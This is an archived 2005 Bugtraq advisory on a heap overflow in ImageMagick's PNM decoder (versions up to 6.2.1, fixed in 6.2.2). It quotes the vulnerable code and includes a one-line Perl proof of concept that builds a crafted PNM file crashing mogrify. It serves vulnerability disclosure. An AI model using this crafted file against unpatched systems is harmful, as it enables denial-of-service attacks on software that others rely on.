lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20050425072940.6925fbef.pucik@overflow.pl>
Date: Mon, 25 Apr 2005 07:29:40 +0200
From: Damian Put <pucik@...rflow.pl>
To: bugtraq@...urityfocus.com
Subject: [Overflow.pl] ImageMagick ReadPNMImage() Heap Overflow


Overflow Security Advisory #3

ImageMagick ReadPNMImage() Heap Overflow

Vendor: ImageMagick (http://www.imagemagick.org)
Affected version: 6.x up to and including 6.2.1
Vendor status: Fixed version released (6.2.2)

Author: Damian Put <pucik@...rflow.pl>
URL: http://www.overflow.pl/adv/imheapoverflow.txt
Date: 25.04.2005

1. Background

ImageMagick is a free software suite to create, edit, and compose bitmap images.
 It can read, convert and write images in a large variety of formats.

http://www.imagemagick.org


2. Description

Remote exploitation of a heap overflow vulnerability could allow execution of
arbitrary code or couse denial of service.

A heap overflow exists in ReadPNMImage() function, that is used to decode
a PNM image files. The vulnerable code is:


coders/pnm.c:

static Image *ReadPNMImage(const ImageInfo *image_info,ExceptionInfo *exception)
{
...
    if ((format == '1') || (format == '4'))
      max_value=1;  /* bitmap */
    else
      max_value=PNMInteger(image,10);
    image->depth=max_value < 256 ? 8UL : QuantumDepth;
    if ((format != '3') && (format != '6'))
      {
        image->storage_class=PseudoClass;
        image->colors=(unsigned long) (max_value >= MaxColormapSize ?
          MaxColormapSize : max_value+1);
      }
...
	if (AllocateImageColormap(image,image->colors) == MagickFalse)
          ThrowReaderException(ResourceLimitError,"MemoryAllocationFailed");
        if (format == '7')
          {
            /*
              Initialize 332 colormap.
            */
            i=0;
            for (pixel.red=0; pixel.red < 8; pixel.red++)
              for (pixel.green=0; pixel.green < 8; pixel.green++)
                for (pixel.blue=0; pixel.blue < 4; pixel.blue++)
                {
                  image->colormap[i].red=ScaleXToQuantum(pixel.red,0x07);
                  image->colormap[i].green=ScaleXToQuantum(pixel.green,0x07);
                  image->colormap[i].blue=ScaleXToQuantum(pixel.blue,0x03);
                  i++;
                }
          }
...

We can manipulate with image->colors value, becouse it`s atributted to "max_value" 
or MaxColormapSize variable. Allocation of memory for image->colormap is based on
image->colors variable (AllocateImageColormap() function). If value of "image->colors"
is for example 1, we allocate only 1*sizeof(PixelPacket) bytes of memory. Next, when
format of PNM file is "7", image->colormap buffer is initialized by 332 colormaps.
If image->colors*sizeof(PixelPacket) bytes are not enought for it, heap structures are
overflowed. We cannot control contents of this buffer, so execute of arbitrary code is
very difficult or imposible, but we can crash it in easy way.


3. PoC

Example crafted PNM file:

bash$ perl -e 'print "P7\n1\n1 1\n1"' > vuln.pnm

We can test vulnerability with "mogrify" - standard ImageMagick utility:

bash$ mogrify vuln.pnm
*** glibc detected *** malloc(): memory corruption: 0x08701198 ***
Przerwane (core dumped)
bash$


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ